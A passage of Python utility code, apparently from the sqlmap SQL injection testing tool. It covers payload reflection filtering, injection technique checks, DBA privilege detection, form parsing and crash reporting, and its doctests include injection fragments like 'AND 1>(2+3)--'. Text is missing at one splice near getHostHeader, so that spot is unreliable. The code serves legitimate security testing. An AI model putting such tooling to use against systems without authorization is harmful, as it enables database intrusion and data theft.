Link') - [u'Title', u'foobar'] - """ - - page = page or "" - - if REFLECTED_VALUE_MARKER in page: - try: - page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) - except MemoryError: - page = page.replace(REFLECTED_VALUE_MARKER, "") - - return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page))) - -def trimAlphaNum(value): - """ - Trims alpha numeric characters from start and ending of a given value - - >>> trimAlphaNum(u'AND 1>(2+3)-- foobar') - u' 1>(2+3)-- ' - """ - - while value and value[-1].isalnum(): - value = value[:-1] - - while value and value[0].isalnum(): - value = value[1:] - - return value - -def isNumPosStrValue(value): - """ - Returns True if value is a string (or integer) with a positive integer representation - - >>> isNumPosStrValue(1) - True - >>> isNumPosStrValue('1') - True - >>> isNumPosStrValue(0) - False - >>> isNumPosStrValue('-2') - False - """ - - return (value and isinstance(value, basestring) and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0) - -@cachedmethod -def aliasToDbmsEnum(dbms): - """ - Returns major DBMS name from a given alias - - >>> aliasToDbmsEnum('mssql') - 'Microsoft SQL Server' - """ - - retVal = None - - if dbms: - for key, item in DBMS_DICT.items(): - if dbms.lower() in item[0] or dbms.lower() == key.lower(): - retVal = key - break - - return retVal - -def findDynamicContent(firstPage, secondPage): - """ - This function checks if the provided pages have dynamic content. If they - are dynamic, proper markings will be made - """ - - if not firstPage or not secondPage: - return - - infoMsg = "searching for dynamic content" - logger.info(infoMsg) - - blocks = SequenceMatcher(None, firstPage, secondPage).get_matching_blocks() - kb.dynamicMarkings = [] - - # Removing too small matching blocks - for block in blocks[:]: - (_, _, length) = block - - if length <= DYNAMICITY_MARK_LENGTH: - blocks.remove(block) - - # Making of dynamic markings based on prefix/suffix principle - if len(blocks) > 0: - blocks.insert(0, None) - blocks.append(None) - - for i in xrange(len(blocks) - 1): - prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None - suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None - - if prefix is None and blocks[i + 1][0] == 0: - continue - - if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)): - continue - - prefix = trimAlphaNum(prefix) - suffix = trimAlphaNum(suffix) - - kb.dynamicMarkings.append((prefix[-DYNAMICITY_MARK_LENGTH / 2:] if prefix else None, suffix[:DYNAMICITY_MARK_LENGTH / 2] if suffix else None)) - - if len(kb.dynamicMarkings) > 0: - infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '') - logger.info(infoMsg) - -def removeDynamicContent(page): - """ - Removing dynamic content from supplied page basing removal on - precalculated dynamic markings - """ - - if page: - for item in kb.dynamicMarkings: - prefix, suffix = item - - if prefix is None and suffix is None: - continue - elif prefix is None: - page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix.replace('\\', r'\\'), page) - elif suffix is None: - page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix.replace('\\', r'\\'), page) - else: - page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix.replace('\\', r'\\'), suffix.replace('\\', r'\\')), page) - - return page - -def filterStringValue(value, charRegex, replacement=""): - """ - Returns string value consisting only of chars satisfying supplied - regular expression (note: it has to be in form [...]) - - >>> filterStringValue(u'wzydeadbeef0123#', r'[0-9a-f]') - u'deadbeef0123' - """ - - retVal = value - - if value: - retVal = re.sub(charRegex.replace("[", "[^") if "[^" not in charRegex else charRegex.replace("[^", "["), replacement, value) - - return retVal - -def filterControlChars(value): - """ - Returns string value with control chars being supstituted with ' ' - - >>> filterControlChars(u'AND 1>(2+3)\\n--') - u'AND 1>(2+3) --' - """ - - return filterStringValue(value, PRINTABLE_CHAR_REGEX, ' ') - -def isDBMSVersionAtLeast(version): - """ - Checks if the recognized DBMS version is at least the version - specified - """ - - retVal = None - - if Backend.getVersion() and Backend.getVersion() != UNKNOWN_DBMS_VERSION: - value = Backend.getVersion().replace(" ", "").rstrip('.') - - while True: - index = value.find('.', value.find('.') + 1) - - if index > -1: - value = value[0:index] + value[index + 1:] - else: - break - - value = filterStringValue(value, '[0-9.><=]') - - if isinstance(value, basestring): - if value.startswith(">="): - value = float(value.replace(">=", "")) - elif value.startswith(">"): - value = float(value.replace(">", "")) + 0.01 - elif value.startswith("<="): - value = float(value.replace("<=", "")) - elif value.startswith(">"): - value = float(value.replace("<", "")) - 0.01 - - retVal = getUnicode(value) >= getUnicode(version) - - return retVal - -def parseSqliteTableSchema(value): - """ - Parses table column names and types from specified SQLite table schema - """ - - if value: - table = {} - columns = {} - - for match in re.finditer(r"(\w+)[\"'`]?\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I): - columns[match.group(1)] = match.group(2) - - table[conf.tbl] = columns - kb.data.cachedColumns[conf.db] = table - -def getTechniqueData(technique=None): - """ - Returns injection data for technique specified - """ - - return kb.injection.data.get(technique) - -def isTechniqueAvailable(technique): - """ - Returns True if there is injection data which sqlmap could use for - technique specified - """ - - if conf.tech and isinstance(conf.tech, list) and technique not in conf.tech: - return False - else: - return getTechniqueData(technique) is not None - -def isStackingAvailable(): - """ - Returns True whether techniques using stacking are available - """ - - retVal = False - - if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: - retVal = True - else: - for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): - _ = getTechniqueData(technique) - if _ and "stacked" in _["title"].lower(): - retVal = True - break - - return retVal - -def isInferenceAvailable(): - """ - Returns True whether techniques using inference technique are available - """ - - return any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.STACKED, PAYLOAD.TECHNIQUE.TIME)) - -def setOptimize(): - """ - Sets options turned on by switch '-o' - """ - - #conf.predictOutput = True - conf.keepAlive = True - conf.threads = 3 if conf.threads < 3 else conf.threads - conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor)) - - if not conf.nullConnection: - debugMsg = "turning off --null-connection switch used indirectly by switch -o" - logger.debug(debugMsg) - -def initTechnique(technique=None): - """ - Prepares data for technique specified - """ - - try: - data = getTechniqueData(technique) - resetCounter(technique) - - if data: - kb.pageTemplate, kb.errorIsNone = getPageTemplate(data.templatePayload, kb.injection.place) - kb.matchRatio = data.matchRatio - kb.negativeLogic = (technique == PAYLOAD.TECHNIQUE.BOOLEAN) and (data.where == PAYLOAD.WHERE.NEGATIVE) - - # Restoring stored conf options - for key, value in kb.injection.conf.items(): - if value and (not hasattr(conf, key) or (hasattr(conf, key) and not getattr(conf, key))): - setattr(conf, key, value) - debugMsg = "resuming configuration option '%s' (%s)" % (key, value) - logger.debug(debugMsg) - - if value and key == "optimize": - setOptimize() - else: - warnMsg = "there is no injection data available for technique " - warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique) - logger.warn(warnMsg) - - except SqlmapDataException: - errMsg = "missing data in old session file(s). " - errMsg += "Please use '--flush-session' to deal " - errMsg += "with this error" - raise SqlmapNoneDataException(errMsg) - -def arrayizeValue(value): - """ - Makes a list out of value if it is not already a list or tuple itself - - >>> arrayizeValue(u'1') - [u'1'] - """ - - if not isListLike(value): - value = [value] - - return value - -def unArrayizeValue(value): - """ - Makes a value out of iterable if it is a list or tuple itself - - >>> unArrayizeValue([u'1']) - u'1' - """ - - if isListLike(value): - if not value: - value = None - elif len(value) == 1 and not isListLike(value[0]): - value = value[0] - else: - _ = filter(lambda _: _ is not None, (_ for _ in flattenValue(value))) - value = _[0] if len(_) > 0 else None - - return value - -def flattenValue(value): - """ - Returns an iterator representing flat representation of a given value - - >>> [_ for _ in flattenValue([[u'1'], [[u'2'], u'3']])] - [u'1', u'2', u'3'] - """ - - for i in iter(value): - if isListLike(i): - for j in flattenValue(i): - yield j - else: - yield i - -def isListLike(value): - """ - Returns True if the given value is a list-like instance - - >>> isListLike([1, 2, 3]) - True - >>> isListLike(u'2') - False - """ - - return isinstance(value, (list, tuple, set, BigArray)) - -def getSortedInjectionTests(): - """ - Returns prioritized test list by eventually detected DBMS from error - messages - """ - - retVal = copy.deepcopy(conf.tests) - - def priorityFunction(test): - retVal = SORT_ORDER.FIRST - - if test.stype == PAYLOAD.TECHNIQUE.UNION: - retVal = SORT_ORDER.LAST - - elif 'details' in test and 'dbms' in test.details: - if intersect(test.details.dbms, Backend.getIdentifiedDbms()): - retVal = SORT_ORDER.SECOND - else: - retVal = SORT_ORDER.THIRD - - return retVal - - if Backend.getIdentifiedDbms(): - retVal = sorted(retVal, key=priorityFunction) - - return retVal - -def filterListValue(value, regex): - """ - Returns list with items that have parts satisfying given regular - expression - - >>> filterListValue(['users', 'admins', 'logs'], r'(users|admins)') - ['users', 'admins'] - """ - - if isinstance(value, list) and regex: - retVal = filter(lambda _: re.search(regex, _, re.I), value) - else: - retVal = value - - return retVal - -def showHttpErrorCodes(): - """ - Shows all HTTP error codes raised till now - """ - - if kb.httpErrorCodes: - warnMsg = "HTTP error codes detected during run:\n" - warnMsg += ", ".join("%d (%s) - %d times" % (code, httplib.responses[code] \ - if code in httplib.responses else '?', count) \ - for code, count in kb.httpErrorCodes.items()) - logger.warn(warnMsg) - if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()): - msg = "too many 4xx and/or 5xx HTTP error codes " - msg += "could mean that some kind of protection is involved (e.g. WAF)" - logger.debug(msg) - -def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1): # "buffering=1" means line buffered (Reference: http://stackoverflow.com/a/3168436) - """ - Returns file handle of a given filename - """ - - try: - return codecs.open(filename, mode, encoding, errors, buffering) - except IOError: - errMsg = "there has been a file opening error for filename '%s'. " % filename - errMsg += "Please check %s permissions on a file " % ("write" if \ - mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") - errMsg += "and that it's not locked by another process." - raise SqlmapSystemException(errMsg) - -def decodeIntToUnicode(value): - """ - Decodes inferenced integer value to an unicode character - - >>> decodeIntToUnicode(35) - u'#' - >>> decodeIntToUnicode(64) - u'@' - """ - retVal = value - - if isinstance(value, int): - try: - if value > 255: - _ = "%x" % value - if len(_) % 2 == 1: - _ = "0%s" % _ - raw = hexdecode(_) - - if Backend.isDbms(DBMS.MSSQL): - retVal = getUnicode(raw, "UTF-16-BE") - elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE): - retVal = unichr(value) - else: - retVal = getUnicode(raw, conf.charset) - else: - retVal = getUnicode(chr(value)) - except: - retVal = INFERENCE_UNKNOWN_CHAR - - return retVal - -def unhandledExceptionMessage(): - """ - Returns detailed message about occurred unhandled exception - """ - - errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING - errMsg += "run with the latest development version from official GitHub " - errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE - errMsg += "at '%s' " % ISSUES_PAGE - errMsg += "with the following text and any other information required to " - errMsg += "reproduce the bug. The " - errMsg += "developers will try to reproduce the bug, fix it accordingly " - errMsg += "and get back to you\n" - errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] - errMsg += "Python version: %s\n" % PYVERSION - errMsg += "Operating system: %s\n" % PLATFORM - errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=sys.stdin.encoding)) - errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None)) - errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms()) - - return errMsg - -def createGithubIssue(errMsg, excMsg): - """ - Automatically create a Github issue with unhandled exception information - """ - - issues = [] - try: - issues = getFileItems(paths.GITHUB_HISTORY, unique=True) - except: - pass - finally: - issues = set(issues) - - _ = re.sub(r"'[^']+'", "''", excMsg) - _ = re.sub(r"\s+line \d+", "", _) - _ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _) - _ = re.sub(r".+\Z", "", _) - key = hashlib.md5(_).hexdigest()[:8] - - if key in issues: - return - - msg = "\ndo you want to automatically create a new (anonymized) issue " - msg += "with the unhandled exception information at " - msg += "the official Github repository? [y/N] " - try: - test = readInput(msg, default="N") - except: - test = None - - if test and test[0] in ("y", "Y"): - ex = None - errMsg = errMsg[errMsg.find("\n"):] - - - data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)} - req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN.decode("base64")}) - - try: - f = urllib2.urlopen(req) - content = f.read() - except Exception, ex: - content = None - - issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "") - if issueUrl: - infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0) - logger.info(infoMsg) - - try: - with open(paths.GITHUB_HISTORY, "a+b") as f: - f.write("%s\n" % key) - except: - pass - else: - warnMsg = "something went wrong while creating a Github issue" - if ex: - warnMsg += " ('%s')" % getSafeExString(ex) - if "Unauthorized" in warnMsg: - warnMsg += ". Please update to the latest revision" - logger.warn(warnMsg) - -def maskSensitiveData(msg): - """ - Masks sensitive data in the supplied message - """ - - retVal = getUnicode(msg) - - for item in filter(None, map(lambda x: conf.get(x), ("hostname", "data", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))): - regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item)) - while extractRegexResult(regex, retVal): - value = extractRegexResult(regex, retVal) - retVal = retVal.replace(value, '*' * len(value)) - - if not conf.get("hostname"): - match = re.search(r"(?i)sqlmap.+(-u|--url)(\s+|=)([^ ]+)", retVal) - if match: - retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) - - if getpass.getuser(): - retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal) - - return retVal - -def listToStrValue(value): - """ - Flattens list to a string value - - >>> listToStrValue([1,2,3]) - '1, 2, 3' - """ - - if isinstance(value, (set, tuple)): - value = list(value) - - if isinstance(value, list): - retVal = value.__str__().lstrip('[').rstrip(']') - else: - retVal = value - - return retVal - -def getExceptionFrameLocals(): - """ - Returns dictionary with local variable content from frame - where exception has been raised - """ - - retVal = {} - - if sys.exc_info(): - trace = sys.exc_info()[2] - while trace.tb_next: - trace = trace.tb_next - retVal = trace.tb_frame.f_locals - - return retVal - -def intersect(valueA, valueB, lowerCase=False): - """ - Returns intersection of the array-ized values - - >>> intersect([1, 2, 3], set([1,3])) - [1, 3] - """ - - retVal = [] - - if valueA and valueB: - valueA = arrayizeValue(valueA) - valueB = arrayizeValue(valueB) - - if lowerCase: - valueA = [val.lower() if isinstance(val, basestring) else val for val in valueA] - valueB = [val.lower() if isinstance(val, basestring) else val for val in valueB] - - retVal = [val for val in valueA if val in valueB] - - return retVal - -def cpuThrottle(value): - """ - Does a CPU throttling for lesser CPU consumption - """ - - delay = 0.00001 * (value ** 2) - time.sleep(delay) - -def removeReflectiveValues(content, payload, suppressWarning=False): - """ - Neutralizes reflective values in a given content based on a payload - (e.g. ..search.php?q=1 AND 1=2 --> "...searching for 1%20AND%201%3D2..." --> "...searching for __REFLECTED_VALUE__...") - """ - - retVal = content - - try: - if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode: - def _(value): - while 2 * REFLECTED_REPLACEMENT_REGEX in value: - value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) - return value - - payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True)) - regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape"))) - - if regex != payload: - if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check - parts = regex.split(REFLECTED_REPLACEMENT_REGEX) - retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach - - if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs - regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:]))) - - parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX)) - - if regex.startswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) - else: - regex = r"\b%s" % regex - - if regex.endswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) - else: - regex = r"%s\b" % regex - - retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal) - - if len(parts) > 2: - regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) - retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal) - - if retVal != content: - kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 - if not suppressWarning: - warnMsg = "reflective value(s) found and filtering out" - singleTimeWarnMessage(warnMsg) - - if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I): - warnMsg = "frames detected containing attacked parameter values. Please be sure to " - warnMsg += "test those separately in case that attack on this page fails" - singleTimeWarnMessage(warnMsg) - - elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]: - kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1 - if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD: - kb.reflectiveMechanism = False - if not suppressWarning: - debugMsg = "turning off reflection removal mechanism (for optimization purposes)" - logger.debug(debugMsg) - except MemoryError: - kb.reflectiveMechanism = False - if not suppressWarning: - debugMsg = "turning off reflection removal mechanism (because of low memory issues)" - logger.debug(debugMsg) - - return retVal - -def normalizeUnicode(value): - """ - Does an ASCII normalization of unicode strings - Reference: http://www.peterbe.com/plog/unicode-to-ascii - - >>> normalizeUnicode(u'\u0161u\u0107uraj') - 'sucuraj' - """ - - return unicodedata.normalize('NFKD', value).encode('ascii', 'ignore') if isinstance(value, unicode) else value - -def safeSQLIdentificatorNaming(name, isTable=False): - """ - Returns a safe representation of SQL identificator name (internal data format) - Reference: http://stackoverflow.com/questions/954884/what-special-characters-are-allowed-in-t-sql-column-retVal - """ - - retVal = name - - if isinstance(name, basestring): - retVal = getUnicode(name) - _ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) - - if _: - retVal = re.sub(r"(?i)\A%s\." % DEFAULT_MSSQL_SCHEMA, "", retVal) - - if retVal.upper() in kb.keywords or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ("." if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS): - retVal = "`%s`" % retVal.strip("`") - elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2): - retVal = "\"%s\"" % retVal.strip("\"") - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,): - retVal = "\"%s\"" % retVal.strip("\"").upper() - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and not re.match(r"\A\w+\Z", retVal, re.U): - retVal = "[%s]" % retVal.strip("[]") - - if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal): - retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) - - return retVal - -def unsafeSQLIdentificatorNaming(name): - """ - Extracts identificator's name from its safe SQL representation - """ - - retVal = name - - if isinstance(name, basestring): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS): - retVal = name.replace("`", "") - elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2): - retVal = name.replace("\"", "") - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,): - retVal = name.replace("\"", "").upper() - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,): - retVal = name.replace("[", "").replace("]", "") - - if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - prefix = "%s." % DEFAULT_MSSQL_SCHEMA - if retVal.startswith(prefix): - retVal = retVal[len(prefix):] - - return retVal - -def isNoneValue(value): - """ - Returns whether the value is unusable (None or '') - - >>> isNoneValue(None) - True - >>> isNoneValue('None') - True - >>> isNoneValue('') - True - >>> isNoneValue([]) - True - >>> isNoneValue([2]) - False - """ - - if isinstance(value, basestring): - return value in ("None", "") - elif isListLike(value): - return all(isNoneValue(_) for _ in value) - elif isinstance(value, dict): - return not any(value) - else: - return value is None - -def isNullValue(value): - """ - Returns whether the value contains explicit 'NULL' value - - >>> isNullValue(u'NULL') - True - >>> isNullValue(u'foobar') - False - """ - - return isinstance(value, basestring) and value.upper() == NULL - -def expandMnemonics(mnemonics, parser, args): - """ - Expands mnemonic options - """ - - class MnemonicNode(object): - def __init__(self): - self.next = {} - self.current = [] - - head = MnemonicNode() - pointer = None - - for group in parser.option_groups: - for option in group.option_list: - for opt in option._long_opts + option._short_opts: - pointer = head - - for char in opt: - if char == "-": - continue - elif char not in pointer.next: - pointer.next[char] = MnemonicNode() - - pointer = pointer.next[char] - pointer.current.append(option) - - for mnemonic in (mnemonics or "").split(','): - found = None - name = mnemonic.split('=')[0].replace("-", "").strip() - value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None - pointer = head - - for char in name: - if char in pointer.next: - pointer = pointer.next[char] - else: - pointer = None - break - - if pointer in (None, head): - errMsg = "mnemonic '%s' can't be resolved to any parameter name" % name - raise SqlmapSyntaxException(errMsg) - - elif len(pointer.current) > 1: - options = {} - - for option in pointer.current: - for opt in option._long_opts + option._short_opts: - opt = opt.strip('-') - if opt.startswith(name): - options[opt] = option - - if not options: - warnMsg = "mnemonic '%s' can't be resolved" % name - logger.warn(warnMsg) - elif name in options: - found = name - debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) - logger.debug(debugMsg) - else: - found = sorted(options.keys(), key=lambda x: len(x))[0] - warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to: %s). " % (name, ", ".join("'%s'" % key for key in options.keys())) - warnMsg += "Resolved to shortest of those ('%s')" % found - logger.warn(warnMsg) - - if found: - found = options[found] - else: - found = pointer.current[0] - debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) - logger.debug(debugMsg) - - if found: - try: - value = found.convert_value(found, value) - except OptionValueError: - value = None - - if value is not None: - setattr(args, found.dest, value) - elif not found.type: # boolean - setattr(args, found.dest, True) - else: - errMsg = "mnemonic '%s' requires value of type '%s'" % (name, found.type) - raise SqlmapSyntaxException(errMsg) - -def safeCSValue(value): - """ - Returns value safe for CSV dumping - Reference: http://tools.ietf.org/html/rfc4180 - - >>> safeCSValue(u'foo, bar') - u'"foo, bar"' - >>> safeCSValue(u'foobar') - u'foobar' - """ - - retVal = value - - if retVal and isinstance(retVal, basestring): - if not (retVal[0] == retVal[-1] == '"'): - if any(_ in retVal for _ in (conf.get("csvDel", defaults.csvDel), '"', '\n')): - retVal = '"%s"' % retVal.replace('"', '""') - - return retVal - -def filterPairValues(values): - """ - Returns only list-like values with length 2 - - >>> filterPairValues([[1, 2], [3], 1, [4, 5]]) - [[1, 2], [4, 5]] - """ - - retVal = [] - - if not isNoneValue(values) and hasattr(values, '__iter__'): - retVal = filter(lambda x: isinstance(x, (tuple, list, set)) and len(x) == 2, values) - - return retVal - -def randomizeParameterValue(value): - """ - Randomize a parameter value based on occurances of alphanumeric characters - - >>> random.seed(0) - >>> randomizeParameterValue('foobar') - 'rnvnav' - >>> randomizeParameterValue('17') - '83' - """ - - retVal = value - - value = re.sub(r"%[0-9a-fA-F]{2}", "", value) - - for match in re.finditer('[A-Z]+', value): - retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper()) - - for match in re.finditer('[a-z]+', value): - retVal = retVal.replace(match.group(), randomStr(len(match.group())).lower()) - - for match in re.finditer('[0-9]+', value): - retVal = retVal.replace(match.group(), str(randomInt(len(match.group())))) - - return retVal - -def asciifyUrl(url, forceQuote=False): - """ - Attempts to make a unicode URL usuable with ``urllib/urllib2``. - - More specifically, it attempts to convert the unicode object ``url``, - which is meant to represent a IRI, to an unicode object that, - containing only ASCII characters, is a valid URI. This involves: - - * IDNA/Puny-encoding the domain name. - * UTF8-quoting the path and querystring parts. - - See also RFC 3987. - - Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/ - - >>> asciifyUrl(u'http://www.\u0161u\u0107uraj.com') - u'http://www.xn--uuraj-gxa24d.com' - """ - - parts = urlparse.urlsplit(url) - if not parts.scheme or not parts.netloc: - # apparently not an url - return url - - if all(char in string.printable for char in url): - return url - - # idna-encode domain - try: - hostname = parts.hostname.encode("idna") - except LookupError: - hostname = parts.hostname.encode(UNICODE_ENCODING) - - # UTF8-quote the other parts. We check each part individually if - # if needs to be quoted - that should catch some additional user - # errors, say for example an umlaut in the username even though - # the path *is* already quoted. - def quote(s, safe): - s = s or '' - # Triggers on non-ascii characters - another option would be: - # urllib.quote(s.replace('%', '')) != s.replace('%', '') - # which would trigger on all %-characters, e.g. "&". - if s.encode("ascii", "replace") != s or forceQuote: - return urllib.quote(s.encode(UNICODE_ENCODING), safe=safe) - return s - - username = quote(parts.username, '') - password = quote(parts.password, safe='') - path = quote(parts.path, safe='/') - query = quote(parts.query, safe="&=") - - # put everything back together - netloc = hostname - if username or password: - netloc = '@' + netloc - if password: - netloc = ':' + password + netloc - netloc = username + netloc - - try: - port = parts.port - except: - port = None - - if port: - netloc += ':' + str(port) - - return urlparse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment]) - -def isAdminFromPrivileges(privileges): - """ - Inspects privileges to see if those are comming from an admin user - """ - - # In PostgreSQL the usesuper privilege means that the - # user is DBA - retVal = (Backend.isDbms(DBMS.PGSQL) and "super" in privileges) - - # In Oracle the DBA privilege means that the - # user is DBA - retVal |= (Backend.isDbms(DBMS.ORACLE) and "DBA" in privileges) - - # In MySQL >= 5.0 the SUPER privilege means - # that the user is DBA - retVal |= (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema and "SUPER" in privileges) - - # In MySQL < 5.0 the super_priv privilege means - # that the user is DBA - retVal |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema and "super_priv" in privileges) - - # In Firebird there is no specific privilege that means - # that the user is DBA - # TODO: confirm - retVal |= (Backend.isDbms(DBMS.FIREBIRD) and all(_ in privileges for _ in ("SELECT", "INSERT", "UPDATE", "DELETE", "REFERENCES", "EXECUTE"))) - - return retVal - -def findPageForms(content, url, raise_=False, addToTargets=False): - """ - Parses given page content for possible forms - """ - - class _(StringIO): - def __init__(self, content, url): - StringIO.__init__(self, unicodeencode(content, kb.pageEncoding) if isinstance(content, unicode) else content) - self._url = url - def geturl(self): - return self._url - - if not content: - errMsg = "can't parse forms as the page content appears to be blank" - if raise_: - raise SqlmapGenericException(errMsg) - else: - logger.debug(errMsg) - - forms = None - retVal = set() - response = _(content, url) - - try: - forms = ParseResponse(response, backwards_compat=False) - except (UnicodeError, ValueError): - pass - except ParseError: - if ">> getHostHeader('http://www.target.com/vuln.php?id=1') - 'www.target.com' - """ - - retVal = url - - if url: - retVal = urlparse.urlparse(url).netloc - - if re.search("http(s)?://\[.+\]", url, re.I): - retVal = extractRegexResult("http(s)?://\[(?P.+)\]", url) - elif any(retVal.endswith(':%d' % _) for _ in (80, 443)): - retVal = retVal.split(':')[0] - - return retVal - -def checkDeprecatedOptions(args): - """ - Checks for deprecated options - """ - - for _ in args: - if _ in DEPRECATED_OPTIONS: - errMsg = "switch/option '%s' is deprecated" % _ - if DEPRECATED_OPTIONS[_]: - errMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_] - raise SqlmapSyntaxException(errMsg) - -def checkSystemEncoding(): - """ - Checks for problematic encodings - """ - - if sys.getdefaultencoding() == "cp720": - try: - codecs.lookup("cp720") - except LookupError: - errMsg = "there is a known Python issue (#1616979) related " - errMsg += "to support for charset 'cp720'. Please visit " - errMsg += "'http://blog.oneortheother.info/tip/python-fix-cp720-encoding/index.html' " - errMsg += "and follow the instructions to be able to fix it" - logger.critical(errMsg) - - warnMsg = "temporary switching to charset 'cp1256'" - logger.warn(warnMsg) - - reload(sys) - sys.setdefaultencoding("cp1256") - -def evaluateCode(code, variables=None): - """ - Executes given python code given in a string form - """ - - try: - 